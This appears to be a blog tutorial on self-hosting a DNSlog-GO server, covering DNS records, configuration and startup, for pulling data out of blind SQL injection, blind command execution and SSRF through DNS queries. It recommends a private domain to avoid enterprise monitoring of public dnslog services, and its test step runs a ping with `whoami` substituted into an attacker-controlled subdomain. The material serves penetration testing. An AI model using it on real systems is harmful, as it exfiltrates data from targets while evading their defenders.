Introduction to DNSlog
In some cases, the echo cannot be obtained by exploiting the vulnerability. However, if the target can send DNS requests, the desired data can be taken out through the DNS log.
DNS logs are often used in the following situations:
- SQL blind injection
- Command execution without echo
- SSRF without echo
There are many dnslog services publicly available on the Internet, such as dnslog.cn, Zhichuangyu, Clover, etc., but the domain names provided by these services are fixed. Now some relatively large enterprises have added these domain names to the monitoring scope.
If you build a dnslog service yourself, you can avoid this situation very well.
need to prepare
- An Alibaba Cloud domain name
- One VPS server
DNS
Add an A record and an NS record in bigwulong.cn. The A record points to the server IP address, and the NS record points to the domain name address of the A record
method of obtaining
DNSlog-GO uses the dnslog server written in golang, with its own WEB interface, and the web can be customized, edited, modified and beautified. Compatible with Linux, MACOS, Windows and other systems. Each platform can be directly downloaded and run without installation dependencies. Here, Linux is used as an example.
Github address: https://github.com/lanyi1998/DNSlog-GO/releases/
Download address of this site (Linux DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-linux.zip
Download address of this site (MacOS DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-macos.zip
Download address of this site (Windows DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-windows.zip
run
Modify the default token
[root@localhost ~]# vim config.yaml
HTTP:
port: 8000
#{"token":"用户对应子域名"}
user: {
"123456": "logdns" }
consoleDisable: false
Dns:
domain: bigwulong.cn
start up
[root@localhost ~]# ./dnslog-linux &
2023/07/14 07:09:39 Http Listing Start...
2023/07/14 07:09:39 Http address: http://0.0.0.0:8000
2023/07/14 07:09:39 DNS Listing Start...
View process and monitoring
[root@kr-seoul ~]# ps aux | grep dnslog
root 3275 0.0 0.6 714196 6160 pts/0 Sl 07:09 0:00 ./dnslog-linux
root 3296 0.0 0.0 112808 976 pts/0 R+ 07:11 0:00 grep --color=auto dnslog
[root@kr-seoul ~]# netstat -tnlpu | grep -E '8000|53'
tcp6 0 0 :::8000 :::* LISTEN 3275/./dnslog-linux
udp6 0 0 :::53 :::* 3275/./dnslog-linux
test
Web page access test, [font color="red"] needs to enter token, the token here is the value set in config.yaml[/font]
Click to copy the random subdomain name to spmkj.dnslog.bigwulong.cn
Use the ping command
[root@localhost ~]# ping `whoami`.spmkj.dnslog.bigwulong.cn -c 1
PING root.spmkj.dnslog.bigwulong.cn (127.0.0.1) 56(84) bytes of data.
64 bytes from kr-seoul.if010.com (127.0.0.1): icmp_seq=1 ttl=64 time=0.023 ms
root.spmkj.dnslog.bigwulong.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.023/0.023/0.023/0.000 ms
You can see the echo result